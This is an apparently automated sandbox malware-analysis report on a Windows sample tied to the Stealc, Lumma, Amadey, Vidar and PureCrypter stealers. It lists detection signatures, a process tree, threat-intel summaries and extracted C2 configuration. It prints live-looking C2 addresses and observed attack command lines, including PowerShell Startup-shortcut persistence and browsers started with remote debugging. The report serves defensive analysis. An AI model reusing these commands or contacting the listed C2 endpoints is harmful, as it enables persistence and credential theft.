Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1555405
MD5:	f8d1d73a4b017ae508ee5172f7601906
SHA1:	6feb8b7fa058b1f818ea2b2485b8435d87b218c6
SHA256:	4688b875a5efc11c995747658f96f517bf06631e4ab4a1c05d0718abdc33e5fe
Tags:	exeuser-Bitsight
Infos:

Detection

PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Sigma detected: Powershell create lnk in startup

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Detected PureCrypter Trojan

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops PE files to the document folder of the user

Drops PE files to the user root directory

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

Modifies windows update settings

Monitors registry run keys for changes

PE file contains section with special chars

Powershell creates an autostart link

Query firmware table information (likely to detect VMs)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 2232 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F8D1D73A4B017AE508EE5172F7601906)

chrome.exe (PID: 2140 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=2532,i,4469706837044549514,10434759884212031154,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 8096 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3836 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2296,i,5027876848785677956,9727409253048417299,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cmd.exe (PID: 8336 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKECBGCGCGI.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DocumentsKECBGCGCGI.exe (PID: 7852 cmdline: "C:\Users\user\DocumentsKECBGCGCGI.exe" MD5: 0A25084685B54B88100D89D2BF1FB4DE)

skotes.exe (PID: 8496 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 0A25084685B54B88100D89D2BF1FB4DE)

msedge.exe (PID: 7668 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7200 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2800 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8832 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6524 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8916 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6588 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8528 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6536 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5516 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6668 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8356 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=7200 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5988 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 2412 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3388 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

skotes.exe (PID: 2848 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 0A25084685B54B88100D89D2BF1FB4DE)

mk.exe (PID: 6816 cmdline: "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe" MD5: B56761AD16C0E1CDD4765A130123DBC2)

powershell.exe (PID: 5384 cmdline: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

06d4af6f50.exe (PID: 7864 cmdline: "C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe" MD5: 2EB7DD5FC174EA7CE691BA15A1E34BA4)

chrome.exe (PID: 8912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=06d4af6f50.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1052 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1932,i,3331334219866744082,9908711228420436626,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1932,i,3331334219866744082,9908711228420436626,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

deb333ea90.exe (PID: 2140 cmdline: "C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe" MD5: F8D1D73A4B017AE508EE5172F7601906)

skotes.exe (PID: 6588 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 0A25084685B54B88100D89D2BF1FB4DE)

ea44ea94c2.exe (PID: 3056 cmdline: "C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe" MD5: 39307DB79B786D76D1B6070FEC77BC0B)

06d4af6f50.exe (PID: 5408 cmdline: "C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe" MD5: 2EB7DD5FC174EA7CE691BA15A1E34BA4)

chrome.exe (PID: 8064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=06d4af6f50.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2004,i,16542196128712413035,6569779122986016957,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

deb333ea90.exe (PID: 5940 cmdline: "C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe" MD5: F8D1D73A4B017AE508EE5172F7601906)

06d4af6f50.exe (PID: 8040 cmdline: "C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe" MD5: 2EB7DD5FC174EA7CE691BA15A1E34BA4)

mk.exe (PID: 5776 cmdline: "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe" MD5: B56761AD16C0E1CDD4765A130123DBC2)

powershell.exe (PID: 1096 cmdline: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yiuq.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ea44ea94c2.exe (PID: 7844 cmdline: "C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe" MD5: 39307DB79B786D76D1B6070FEC77BC0B)

mk.exe (PID: 4848 cmdline: "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe" MD5: B56761AD16C0E1CDD4765A130123DBC2)

powershell.exe (PID: 1396 cmdline: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zzvy.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mk.exe (PID: 5648 cmdline: "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe" MD5: B56761AD16C0E1CDD4765A130123DBC2)

powershell.exe (PID: 8708 cmdline: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dslm.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mk.exe (PID: 2076 cmdline: "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe" MD5: B56761AD16C0E1CDD4765A130123DBC2)

powershell.exe (PID: 6824 cmdline: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tytb.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mk.exe (PID: 1088 cmdline: "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe" MD5: B56761AD16C0E1CDD4765A130123DBC2)

powershell.exe (PID: 7200 cmdline: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\akdz.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mk.exe (PID: 7928 cmdline: "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe" MD5: B56761AD16C0E1CDD4765A130123DBC2)

powershell.exe (PID: 5472 cmdline: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kncs.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mk.exe (PID: 5032 cmdline: "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe" MD5: B56761AD16C0E1CDD4765A130123DBC2)

powershell.exe (PID: 3304 cmdline: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\syie.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mk.exe (PID: 2576 cmdline: "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe" MD5: B56761AD16C0E1CDD4765A130123DBC2)

powershell.exe (PID: 2284 cmdline: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsap.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
PureCrypter	According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format	No Attribution	https://any.run/cybersecurity-blog/pure-malware-family-analysis/ https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/ https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/ https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter	https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Threatname: LummaC

{"C2 url": "https://frogmen-smell.sbs/api", "Build Version": "LOGS11--LiveTraffi"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000021.00000003.3779914099.00000000019BC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.3635881339.000000000180B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.3825982133.00000000019BD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000002.2763202923.0000000000621000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001E.00000003.3570296328.0000000001804000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.3826632372.00000000019BD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2174877121.0000000005310000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001B.00000002.3502627065.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001B.00000002.3501473948.0000000000691000.00000040.00000001.01000000.00000013.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001E.00000003.3628606604.0000000001805000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.3779631003.00000000019BC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000020.00000002.3671582881.0000000000691000.00000040.00000001.01000000.00000013.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000021.00000003.3797636503.00000000019BD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.3576014909.0000000001804000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000020.00000002.3673961826.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000020.00000003.3612721796.0000000004C30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001B.00000003.3461206243.0000000005040000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2675026709.000000000153E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2672659024.0000000000D81000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000021.00000003.3757488399.00000000019BC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.3592012775.0000000001806000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.2790671022.0000000000781000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001E.00000003.3628353430.0000000001804000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.3610517200.0000000001804000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.3593717445.0000000001804000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.3636048689.0000000001812000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 2232	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 2232	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 2232	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 2232	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 06d4af6f50.exe PID: 7864	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 06d4af6f50.exe PID: 7864	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: deb333ea90.exe PID: 2140	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: deb333ea90.exe PID: 2140	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 06d4af6f50.exe PID: 5408	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 06d4af6f50.exe PID: 5408	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 06d4af6f50.exe PID: 5408	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
